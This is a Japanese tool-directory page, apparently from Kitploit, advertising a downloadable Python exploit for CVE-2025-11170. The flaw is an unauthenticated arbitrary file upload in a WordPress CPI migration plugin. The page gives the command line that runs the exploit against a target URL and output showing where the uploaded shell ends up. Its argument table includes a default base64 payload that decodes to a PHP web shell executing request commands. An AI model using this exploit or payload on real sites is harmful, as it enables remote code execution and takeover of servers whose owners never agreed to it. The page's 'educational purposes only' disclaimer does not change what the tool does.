Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-11170 — WP移行専用プラグイン for CPI <= 1.0.2 - Unauthenticated Arbitrary File Upload | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-11170
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2025-11170

CVE-2025-11170

WP移行専用プラグイン for CPI <= 1.0.2 - Unauthenticated Arbitrary File Upload

リポジトリを見る
210ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-11170

WP移行専用プラグイン for CPI <= 1.0.2 - 認証なし任意ファイルアップロード

🚀 WP移行専用プラグイン for CPI <= 1.0.2 - 認証なし任意ファイルアップロード

📝 説明

WordPress用プラグイン WP移行専用プラグイン for CPI は、Cpiwm_Import_Controller::import 関数におけるファイルタイプ検証の欠如により、1.0.2 を含む全バージョンで任意ファイルアップロードの脆弱性があります。
これにより、認証されていない攻撃者が影響を受けるサイトのサーバーに任意のファイルをアップロードでき、リモートコード実行につながる可能性があります。

🛡️ 脆弱性の詳細

  • CVE: CVE-2025-11170
  • CVSSスコア: 9.8 (Critical)
  • 攻撃ベクトル: 認証なしのリモートファイルアップロード

⚡ スクリプト情報

  • スクリプト名: CVE-2025-11170.py
  • 目的: 脆弱性のある WordPress CPI 移行プラグイン向けの自動シェル/ファイルアップロードエクスプロイト。

🔧 使用方法

引数

🚦 メソッドの説明

  • Nxploited_parse_args
    入力引数を解析・検証します。正しいエンドポイント構造、ヘッダー、データエンコーディングを保証します。

  • Nxploited_logging
    詳細または最小限の実行時出力のための高度なロギングと冗長性を設定します。

  • Nxploited_retry_session
    耐障害性のある通信のために、リトライとバックオフロジックを備えた永続セッションを初期化します。

  • Nxploited_build_payload
    エクスプロイト用のPOSTリクエストパラメータを構築します。

  • Nxploited_send
    脆弱性のあるエンドポイントへの実際のPOSTリクエストを実行し、レスポンス/エラーを処理します。

  • Nxploited_output_result
    レスポンスを処理・整形し、成功時にはシェルのパスを、それ以外の場合はデバッグ情報を表示します。


💡 使用例

root@kitploit:~
python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"

出力例:

root@kitploit:~
Uploading shell...
Processing response...
[+] Upload successful!
Shell path:
http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
Nxploited
My GitHub: https://github.com/Nxploited

🚨 免責事項

このスクリプトは教育目的のみで提供されています。
許可なくターゲットに対してこのエクスプロイトを使用することは違法となる場合があります。
作者は、誤用、損害、または法的結果について一切の責任を負いません。


📢 連絡先

GitHub: Nxploited
Telegram: KNxploited


作者: Nxploited ( Khaled Alenazi )

ツールをダウンロード
引数説明
-u, --urlベースターゲットURL(例: http://target.com/wordpress/)。スクリプトは wp-admin/admin-ajax.php を自動的に追加します。
-f, --filenameアップロードするシェルまたはファイル名。デフォルト: shell.php
-d, --database64(または生テキスト)で指定するファイルの内容。デフォルト: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
-i, --indexインデックスフィールドの値。デフォルト: 0
-H, --headers追加のHTTPヘッダー(形式: X-Key:Value;K2:Value2)
-t, --timeoutHTTPリクエストのタイムアウト(秒)。デフォルト: 10
--retriesリトライ回数。デフォルト: 3
--backoffリトライ間のバックオフ係数(秒)。デフォルト: 0.7
-v, --verboseデバッグ用の冗長性を上げる(繰り返し指定可能)